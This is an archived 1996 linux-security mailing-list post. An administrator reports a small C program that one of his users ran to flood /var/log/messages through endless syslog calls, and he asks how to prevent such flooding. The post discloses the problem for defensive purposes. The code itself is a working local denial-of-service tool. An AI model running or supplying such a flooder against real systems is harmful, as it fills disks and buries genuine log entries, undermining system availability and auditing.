[1085] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] RE: Little exploit in syslogd...

daemon@ATHENA.MIT.EDU (Vladislav S. Davidzon)
Tue Aug 27 08:07:46 1996

Date: Mon, 26 Aug 1996 21:05:37 -0500 (CDT)
From: "Vladislav S. Davidzon" <davidzon@grfn.org>
To: linux-security@tarsier.cv.nrao.edu
cc: cert@cert.org

Here is something I found one of my users using... floods
/var/log/messages....

/* blah.c - does neato thing */
#include <syslog.h>
#define blah "Blah blah blah..."

void Puke()
{
  char buffer[4096];
  int i, a;

  for (i = 0; i<4000; i++)
    buffer[i] = 65;

syslog(LOG_CRIT, buffer);

  for (a = 0; a<4000; a++)
    syslog(LOG_INFO, blah);
}

main()
{
  goto puke;
puke: Puke();
      goto puke;
}



Pretty anoying little program... any ideas how to make it NOT work????
Make messages NOT floodable?

Sincerely,


V. Davidzon

home help back first fref pref prev next nref lref last post